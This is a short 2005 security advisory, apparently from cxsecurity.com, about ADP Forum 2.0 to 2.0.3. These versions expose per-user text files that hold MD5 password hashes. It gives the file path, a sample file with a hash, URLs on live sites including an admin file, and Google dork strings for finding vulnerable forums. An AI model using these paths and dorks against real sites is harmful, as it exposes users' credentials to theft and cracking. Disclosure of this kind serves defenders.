ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3 versiyon user md5 hash bug

2005.12.14
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3 versiyon user md5 hash bug ---------------------------------------------------- site:http://www.linux.it/~fedro/ demo:http://www.e-stamp.ru/forum203/ -------------------------------------------------- http://target.com/pacth/users/username.txt ---------------------------------------------------- username.txt file username Master Member 52 images/avatars/1037850652.jpg http://www.website.com wamp (at) website (dot) com [email concealed] 176311476 20-11-2002 username 1f8c48c0c6e421b907e72ab6d4aa8ca9 1037850652 -------------------------------------------------------- example: http://www.wamp.ca/forum/users/Paul.txt http://www.wamp.ca/forum/users/javadog.txt http://www.e-stamp.ru/forum203/users/admin.txt vs.. --------------------------------------------------------- Credit:Liz0ziM mail:liz0 (at) bsdmail (dot) com [email concealed] www.biyo.tk,www.cehennem.org ----------------------------------------------------------- http://www.blogcu.com/Liz0ziM/144336/ http://biyo.5gigs.com/adpforum.txt ------------------------------------------------------------ google: "ADP Forum 2.0.3 is powered by VzScripts" "ADP Forum 2.0.2" "ADP Forum 2.0.1" "ADP Forum 2.0"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top